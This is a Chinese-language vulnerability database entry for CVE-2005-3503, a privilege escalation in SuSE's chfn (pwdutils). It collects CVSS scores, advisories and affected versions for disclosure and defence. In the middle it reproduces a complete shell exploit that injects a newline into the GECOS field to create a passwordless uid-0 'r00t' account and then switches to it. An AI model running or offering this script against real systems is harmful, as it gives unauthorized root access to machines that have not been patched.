CVE-2005-3503
CVSS7.2
发布时间 :2005-11-05 06:02:00
修订时间 :2008-09-05 16:54:34
NMCOES    

[原文]chfn in pwdutils 3.0.4 and earlier on SuSE Linux, and possibly other operating systems, does not properly check arguments for the GECOS field, which allows local users to gain privileges.


[CNNVD]pwdutils CHFN本地用户提升权限漏洞(CNNVD-200511-134)

        pwdutils是一套密码管理工具,可管理NIS,NIS+和LDAP里的密码。
        SuSE Linux以及可能的其他操作系统上的pwdutils 3.0.4及更早版本中的chfn,未适当检查GECOS字段的参数,这可让本地用户获得特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3503
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3503
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-134
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/415725/30/0/threaded
(VENDOR_ADVISORY)  SUSE  SUSE-SA:2005:064
http://www.securityfocus.com/bid/15314
(UNKNOWN)  BID  15314
http://www.osvdb.org/20525
(UNKNOWN)  OSVDB  20525
http://secunia.com/advisories/17469
(UNKNOWN)  SECUNIA  17469

- 漏洞信息

pwdutils CHFN本地用户提升权限漏洞
高危 输入验证
2005-11-05 00:00:00 2005-11-15 00:00:00
本地  
        pwdutils是一套密码管理工具,可管理NIS,NIS+和LDAP里的密码。
        SuSE Linux以及可能的其他操作系统上的pwdutils 3.0.4及更早版本中的chfn,未适当检查GECOS字段的参数,这可让本地用户获得特权。

- 公告与补丁

        暂无数据

- 漏洞信息 (1299)

SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit (EDBID:1299)
linux local
2005-11-08 Verified
0 Hunger
N/A [点击下载]
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
# 
# by Hunger <susechfn@hunger.hu>
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
# 
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)

if [ X"$SHELL" = "X" ]; then
	echo "No SHELL environment, using /bin/sh for default."
	export SHELL=/bin/sh
fi

if [ -u /usr/bin/chfn ]; then
	/bin/echo "Type your current password to get root... :)"
	/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
	if [ -u /bin/su ]; then
		/bin/su r00t
		/bin/echo "You can get root again with 'su r00t'"
	else 
		echo "/bin/su file is not setuid root :("
	fi
else
echo "/usr/bin/chfn file is not setuid root :("
fi

# milw0rm.com [2005-11-08]
		

- 漏洞信息

20525
SUSE Linux pwdutils chfn Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

SUSE Linux contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the setuid 'chfn' binary in the 'pwdutils' suite does not properly check arguments when changing the 'GECOS' field, which may allow a malicious user to gain access to root privileges resulting in a loss of integrity.

- 时间线

2005-11-04 Unknow
Unknow Unknow

- 解决方案

Contact the vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

CHFN User Modification Privilege Escalation Vulnerability
Input Validation Error 15314
No Yes
2005-11-04 12:00:00 2007-11-15 12:37:00
This issue was announced in the referenced SUSE security advisory. Thomas Gerisch is credited with the discovery of this vulnerability.

- 受影响的程序版本

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
shadow shadow 4.0.3
Salvatore Valente chfn
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
pwdutils pwdutils 3.0.4
pwdutils pwdutils 2.6.96
pwdutils pwdutils 2.6.90
pwdutils pwdutils 2.6.4
pwdutils pwdutils 2.6.3

- 漏洞讨论

The 'chfn' utility is prone to a privilege-escalation vulnerability because it fails to properly sanitize user-supplied input.

A local attacker can exploit this vulnerability to escalate privileges to that of the superuser account.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An example script demonstrating this issue is provided by Hunger <susechfn@hunger.hu>:

- 解决方案

Please see the referenced advisory for more information.


pwdutils pwdutils 2.6.3

pwdutils pwdutils 2.6.90

pwdutils pwdutils 2.6.96

pwdutils pwdutils 3.0.4

shadow shadow 4.0.3

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站